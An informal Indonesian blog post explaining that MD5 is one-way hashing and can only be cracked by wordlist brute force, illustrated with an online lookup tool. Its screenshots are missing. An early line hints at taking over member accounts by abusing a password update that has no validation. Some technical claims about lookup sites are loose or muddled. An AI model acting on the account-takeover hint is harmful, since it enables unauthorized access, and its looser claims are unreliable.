Jadi Md5 Itu Kalo Mau di Decrypt/Decode Harus Pakai Wordlist, Dan Harus Di BF (BruteForce).
Nah Gimana Cara Tau Password Type Md5?..
Caranya?..  

Cukup Kirim Email Dalam Bentuk Link, Ke Email Member Yang Terdaftar Dalam Link Tersebut.
Dan Update Password Tanpa Validasi.
------------------------------------------------------------------
Lalu Taukah Kalian?.. Bahwa Sistem Md5 Itu One Way Hashing (Hanya Dapat Di Enskripsi Dengan 1 Arah Saja).
Jadi Tidak Bisa Di Decrypt :')

Terus Jika Ada Website Yang Dapat Mendecrypt Md5 Biasanya Hanya Mencuri Database Dari User Yang Pernah Di Encrypt Di Website Tersebut.

Jadi Intinya Md5 Yang Sudah Di Generate Tidak Dalat Di Kembalikan Kedalam String Semula,
Dan Juga Tidak Dapat Memproteksi Isi String Di Dalam Md5 Tersebut.

Tidak Percaya Jika Md5 Berbasis One Way Hashing (Hanya Dapat Di Encrypt 1 Arah Saja)?...

Mari Kita Coba.
Pertama: Kalian Buka Tools Encrypt/Decrypt Di Google, Seperti: Hashkiller,Md5Decrypt,Dll
Di Sini Gw Pakai Tools Md5Decrypt. 

Lalu Kita Coba Encrypt Kata Yang Tidak Ada Hubungannya Dengan Database Atau Ngasal Juga Boleh :v.
Buatlah Kata Yang Sangat Tidak Masuk Akal
------------------------------------------------------------------
NB:(JIKA HANYA ANGKA DAN KATA YANG SANGAT SERING MUNCUL DIMANA", MAKA AKAN DAPAT TERDECRYPT)
------------------------------------------------------------------

Misalnya Seperti Ini:

Jadi Digambar Tersebut Gw Dapat Mengencrypt Kata Tersebut.

Sekarang Kita Coba Decrypt Yah

Seperti Ini:
Dan Apa Yang Terjadi?..
Decrypt Kata Gagal :'(

Itu Lah Sebabnya Mengapa Md5 Di Sebut One Way Hashing (Hanya Dapat Di Encrypt Satu Arah)

Yah Gw Rasa G Usah Panjang" Artikel Nya
Pasti Lo Bakal Bosen Ya Wkwk

Begitulah Sedikit Artikel Dari Gw Chichi Canz.
Dan Gw Haikal Ganz Menyuruh Kalian Berpamitan Dengan Cara Membaca Kalimat Di Bawah!!!...
------------------------------------------------------------------
Wassalamualaikum :')